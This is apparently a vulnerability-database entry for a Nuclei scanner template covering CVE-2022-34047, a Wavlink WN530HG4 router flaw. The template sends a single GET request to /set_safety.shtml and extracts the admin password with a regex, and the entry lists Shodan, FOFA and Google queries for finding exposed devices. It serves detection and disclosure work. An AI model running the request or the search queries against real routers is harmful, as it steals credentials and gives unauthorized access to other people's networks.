Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-34047HistoryJul 20, 2022 - 7:39 p.m.
WAVLINK WN530HG4 - Improper Access Control
2022-07-2019:39:27
ProjectDiscovery
github.com
11
security vulnerability router exposure
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.189
Percentile
96.3%
WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-34047
info:
name: WAVLINK WN530HG4 - Improper Access Control
author: For3stCo1d
severity: high
description: |
WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
remediation: |
Apply the latest firmware update provided by the vendor to fix the access control issue.
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
- http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-34047
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
epss-score: 0.14292
epss-percentile: 0.95577
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wavlink
product: wl-wn530hg4_firmware
shodan-query:
- http.title:"Wi-Fi APP Login"
- http.html:"wn530hg4"
- http.title:"wi-fi app login"
fofa-query:
- body="wn530hg4"
- title="wi-fi app login"
google-query: intitle:"wi-fi app login"
tags: cve,cve2022,wavlink,router,exposure,packetstorm
http:
- raw:
- |
GET /set_safety.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var syspasswd="'
- '<title>APP</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'
# digest: 4a0a0047304502207b09ffdb5dcd0a662d33904e78c08914494fc575cd0d08e657821349324c6365022100dd0e600967d44de27047a34fda2daf1a0fbf56219ef30fb1351995cae49f93bb:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2022-34047
2022-07-20 17:15:08
exploitdb
exploitdb
Wavlink WN530HG4 - Password Disclosure
2022-08-01 00:00:00
prion
prion
Design/Logic Flaw
2022-07-20 17:15:00
zdt
zdt
Wavlink WN530HG4 - Password Disclosure Vulnerability
2022-08-01 00:00:00
packetstorm
packetstorm
Wavlink WN530HG4 Password Disclosure
2022-08-01 00:00:00
cve
cve
CVE-2022-34047
2022-07-20 17:15:08
cvelist
cvelist
CVE-2022-34047
2022-07-20 16:50:11
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
0.189
Percentile
96.3%
Related for NUCLEI:CVE-2022-34047